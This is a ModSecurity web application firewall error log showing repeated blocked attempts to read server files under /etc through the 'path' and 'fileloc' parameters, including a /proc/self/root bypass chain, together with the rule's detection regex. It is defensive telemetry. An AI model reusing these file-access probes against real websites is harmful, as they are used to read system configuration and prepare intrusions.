[Fri Mar 20 08:59:31.415468 2026] [:error] [pid 11642:tid 140411590858496] [client 57.141.18.47:35500] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02o7ninkcc-iUj5AppgwAAA5I"]
[Fri Mar 20 08:59:31.811286 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.243.128:33316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02o11pVZ5mVmJwsFM9IQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:31.838072 2026] [:error] [pid 7235:tid 140411683178240] [client 57.141.18.43:35524] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02o_qxLDW4GITHUkT08gAAAQc"]
[Fri Mar 20 08:59:31.955371 2026] [:error] [pid 9818:tid 140411641214720] [client 57.141.18.118:35532] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02o11pVZ5mVmJwsFM9IgAAAEw"]
[Fri Mar 20 08:59:32.460884 2026] [:error] [pid 26799:tid 140411666392832] [client 57.141.18.8:35568] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02pNa6ubjKNq_cu4bh0wAAA0k"]
[Fri Mar 20 08:59:32.679166 2026] [:error] [pid 26799:tid 140411674785536] [client 57.141.18.83:35584] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02pNa6ubjKNq_cu4bh1QAAA0g"]
[Fri Mar 20 08:59:32.952505 2026] [:error] [pid 7235:tid 140411708356352] [client 57.141.18.80:35602] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02pPqxLDW4GITHUkT08wAAAQQ"]
[Fri Mar 20 08:59:34.640620 2026] [:error] [pid 7235:tid 140411741927168] [client 57.141.18.56:35624] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02pfqxLDW4GITHUkT09AAAAQA"]
[Fri Mar 20 08:59:34.641562 2026] [:error] [pid 15826:tid 140411741927168] [client 57.141.18.51:35626] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02peoXxyEfFpUF8f-L-wAAAUA"]
[Fri Mar 20 08:59:34.652514 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.24:35654] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02pl1pVZ5mVmJwsFM9JwAAAEs"]
[Fri Mar 20 08:59:34.658299 2026] [:error] [pid 9818:tid 140411616036608] [client 74.7.243.128:33324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02pV1pVZ5mVmJwsFM9JAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:34.687506 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.39:35682] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02pvXLqtnMIWvjpaKmHQAAAoM"]
[Fri Mar 20 08:59:35.211382 2026] [:error] [pid 21219:tid 140411582465792] [client 57.141.18.70:35718] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02p_XLqtnMIWvjpaKmHgAAApM"]
[Fri Mar 20 08:59:35.475693 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.62:35722] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02p_XLqtnMIWvjpaKmHwAAAoQ"]
[Fri Mar 20 08:59:35.895423 2026] [:error] [pid 11167:tid 140411725141760] [client 57.141.18.46:35648] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02p_HIg5MgXLBnicMCZAAAAcI"]
[Fri Mar 20 08:59:36.102415 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:33336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02qDJ3M9BSuKP7CAYqhAAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:36.250469 2026] [:error] [pid 10189:tid 140411649607424] [client 57.141.18.2:35734] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02qDJ3M9BSuKP7CAYqhQAAAIs"]
[Fri Mar 20 08:59:36.309203 2026] [:error] [pid 26799:tid 140411632822016] [client 57.141.18.39:35744] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02qNa6ubjKNq_cu4bh2gAAA00"]
[Fri Mar 20 08:59:36.800915 2026] [:error] [pid 11642:tid 140411641214720] [client 57.141.18.84:35776] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02qLninkcc-iUj5AppiAAAA4w"]
[Fri Mar 20 08:59:37.203550 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.19:35792] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02qTJ3M9BSuKP7CAYqhwAAAJc"]
[Fri Mar 20 08:59:37.366854 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:33344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02qeoXxyEfFpUF8f-L_gAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:37.792885 2026] [:error] [pid 11642:tid 140411616036608] [client 57.141.18.45:35814] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02qbninkcc-iUj5AppiQAAA48"]
[Fri Mar 20 08:59:38.080081 2026] [:error] [pid 11167:tid 140411565680384] [client 57.141.18.77:35826] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02qvHIg5MgXLBnicMCZgAAAdU"]
[Fri Mar 20 08:59:38.293062 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.48:35834] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02qta6ubjKNq_cu4bh4AAAA1g"]
[Fri Mar 20 08:59:38.696848 2026] [:error] [pid 11642:tid 140411733534464] [client 57.141.18.15:35856] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02qrninkcc-iUj5AppigAAA4E"]
[Fri Mar 20 08:59:38.790450 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.114:35858] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02qvHIg5MgXLBnicMCZwAAAc0"]
[Fri Mar 20 08:59:39.154203 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.54:35894] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02q_qxLDW4GITHUkT0_AAAAQ4"]
